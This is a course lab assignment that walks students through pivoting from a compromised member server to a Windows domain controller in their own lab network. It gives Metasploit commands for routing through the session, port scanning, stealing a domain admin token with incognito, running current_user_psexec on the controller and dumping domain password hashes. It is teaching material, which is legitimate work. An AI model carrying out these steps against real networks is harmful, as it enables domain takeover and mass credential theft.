Proj 17x: Pivoting and Exploiting a Domain Controller (20 pts. extra credit)

What You Need for this Project

Purpose

To practice pivoting, token theft, and exploiting a Domain Controller.

Start your Domain Controller

Start the Domain Controller you made in the previous project.

Start the Member Server

Start your Member Server.

Log in as

Verifying Domain Configuration

On your Member Server, at the lower left of the desktop, right-click the third icon. Click "Run as Administrator", as shown below.

A User Account Control box pops up. Click Yes.

In the Administrator PowerShell window, execute this command:

ping hackme.com
You should get replies, as shown below.

If you don't, you need to fix your networking problems before proceeding with this project.

Find the IP Address of your Member Server

On your Member Server, in PowerShell, execute the ipconfig command.

Make a note of your IP address.

Log On to the Domain Controller

Click in the desktop of your Domain Controller. Send Ctrl+Alt+Delete to it.

Click "Other User" and log in with these credentials:

The desktop appears, and Server Manager opens.

Restricting Access to the Domain Controller

In Server Manager, at the top right, click Tools, "Windows Firewall with Advanced Security", as shown below.

In Windows Firewall with Advanced Security, on the left side, click "Inbound Rules", as shown below.

On the right side, click "New Rule", as shown below.

The New Inbound Rule Wizard opens. Click Custom, as shown below.

Click Next.

On the "Program" page, verify that the "All programs" radio button is selected and click Next.

On the "Protocol and Ports" page, leave everything at its default and click Next.

On the "Scope" page, in the lower section, click "These IP Addresses", as shown below.

On the right side, click the Add... button.

In the "IP Address" box, click "This IP address range".

Enter a "From" and "To" address that includes your Kali attacker, but not the Member server, as shown below.

Click OK.

Click Next.

In the "Action" box, click "Block the connection" as shown below.

Click Next.

Click Next.

In the "Name" box, enter a Name of "Isolate DC" as shown below.

Click Finish.

Finding the Domain Controller's IP Address

On the Domain Controller, open PowerShell and execute the IPCONFIG command. Make a note of its IP address.

Exploiting the Member Server with ETERNALROMANCE

You should already have done this in a previous project, so you have a Meterpreter session on the Member Server, with SYSTEM privileges,

Scanning the Network with netdiscover

On Kali, in a Terminal window, execute this command, replacing the IP address range with the correct range for your network. 
netdiscover -r 172.16.1.0/24
A list of IP addresses appears, as shown below.

You should see your Domain Controller in the list--for me, it was at 172.16.1.201.

Scanning the Domain Controller with nmap

On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Domain Controller. 
nmap 172.16.1.201
All ports are filtered, as shown below. This is because the firewall rule is blocking probes from our Kali machine.

Configuring a Route on the Member Server

On Kali, in the Meterpreter session controlling the Member Server, execute this command: 
background
That places the session in the background.

On Kali, in msfconsole, execute these commands: 

use post/multi/manage/autoroute
show info
Information appears about the module, as shown below.

On Kali, in msfconsole, execute these commands. Replace the IP address with the IP address of the network containing your Domain Controller. 

set SESSION 1
set CMD add
set SUBNET 172.16.1.0
exploit
The module runs, adding a route to the subnet, as shown below.

On Kali, execute these commands to see the routing table. 

set CMD print
exploit
The routing table now sends traffic to the subnet through session 1, as shown below.

Scanning the Domain Controller

On Kali, execute these commands to see how Metaspoit's port scanner works. 
use auxiliary/scanner/portscan/tcp 
show info
The parameters are explained, as shown below.

On Kali, execute these commands to scan TCP ports 139 and 445 on the Domain Controller.

Replace the IP address with the IP address of your Domain Controller. 

set PORTS 139,445
set RHOSTS 172.16.1.201
exploit
The ports are open, because we are pivoting through the Member Server, as shown below.

Saving the Screen Image

Make sure you can see two "TCP OPEN messages, as shown above.

Save a FULL DESKTOP image with the filename Proj 17xa from Your Name.

Exploitation Options

To exploit the domain controller, we could use ETERNALROMANCE again, or pass the hash, but for this project we'll use token theft, just to practice it.

Enumerating Tokens

On Kali, execute these commands to see the privilege tokens available on the Member Server. 
sessions -i 1
use incognito
list_tokens -u
The only domain account available now is HACKME/Sally, as shown below.

Opening a Privileged Session from the Member Server

Token theft will only work when there's a process running with elevated privileges, which there often is.

For this project, we'll open a privileged Command Prompt to serve that role.

Click on the desktop of your Member Server.

Press Enter.

It goes to a login screen. Send Ctrl+Alt+Delete.

Log in with these credentials:

The desktop appears.

At the lower left of the desktop, click the third icon to open PowerShell.

In PowerShell, execute this command: 

runas /user:administrator@hackme.com cmd
It asks for your password. Enter

P@ssw0rd123

A Command Prompt opens, running with domain administrator privileges, as shown below.

Enumerating Tokens

On Kali, in the Meterpreter session, execute this command. 
list_tokens -u
Now a domain administrator token is available, as shown below.

Escalating Privileges to Domain Admin

On Kali, in the Meterpreter session, execute these commands. 
impersonate_token HACKME\\Administrator
shell
whoami
You are now a domain administrator, as shown below.

Backgrounding the Channel and Session

At the Command Prompt, execute this command: 
exit
At the meterpreter Prompt, execute this command: 
background
You are now back in Metasploit, as shown below.

(Because I shut down my machine and re-started the project, my session is now 2; yours may still be 1.)

Exploiting the Domain Controller

Im Metasploit, execute these commands. 
use exploit/windows/local/current_user_psexec
show info
This exploit lets us run code on the domain controller using the token, without a need for a password or hash, as shown below.

At the meterpreter prompt, execute these commands. Use the IP address of your Domain Controller and the session number of your Domain Admin session. 

set RHOSTS 172.16.1.201
set SESSION 2
exploit
A new session opens, as shown below.

Execute these commands to interact with the new session, and see the system information. Adjust the session number as needed. 

sessions -i 3
sysinfo

At the meterpreter Prompt, execute this command: 

background
You are now back in Metasploit.

Dumping Domain Hashes

Im Metasploit, execute these commands. 
use post/windows/gather/smart_hashdump
show info
This exploit dumps domain hashes, as shown below.

At the meterpreter prompt, execute these commands. Use the session number of your Domain Controller session. 

set SESSION 5
exploit
Hashes appear, as shown below.

Saving the Screen Image

Make sure you can see the message "This host is a Domain Controller!" and some hashes, as shown above.

Save a FULL DESKTOP image with the filename Proj 17xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124m@gmail.com with a Subject line of Proj 17x from Your Name.

References

Pivoting
Fun with Incognito
Posted 9-27-17 by Sam Bowne